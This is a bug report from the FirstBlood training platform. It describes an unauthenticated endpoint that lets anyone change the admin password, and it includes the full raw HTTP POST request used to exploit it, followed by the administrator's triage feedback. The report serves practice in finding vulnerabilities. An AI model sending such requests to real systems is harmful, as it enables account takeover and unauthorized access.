FirstBlood-#1000Change Password of admin user
This issue was discovered on FirstBlood v3



On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,

Summary:

From previous hackevents reports, I gathered the /drpanel/drapi/editpassword.php endpoint and it works in this version also. I can change the password of any user(admin in this case) and there is no CSRF protection on this page so we can exploit easily.

Steps To Reproduce:

  1. Send this request in burpsuite and you will get the password in response.
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: ffa62eb87170-ayush1098.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Length: 29

username=admin

Note the username parameter and the Content-Length in the above request.

Impact:

Anyone can change the admin password and can manipulate the user data.

Thanks & Regards Ayush Singh

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: NA

Payload: Na


FirstBlood ID: 52
Vulnerability Type: Auth issues

The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. The username was renamed from previous versions from drAdmin to admin

Report Feedback

@zseano

Creator & Administrator


Congratulations you were the first to discover this bug! The lack of CSRF protection on this endpoint is something considered informative as the attacker doesn't need CSRF to gain access (Yes they could lock the admin out, but they could easily regain access)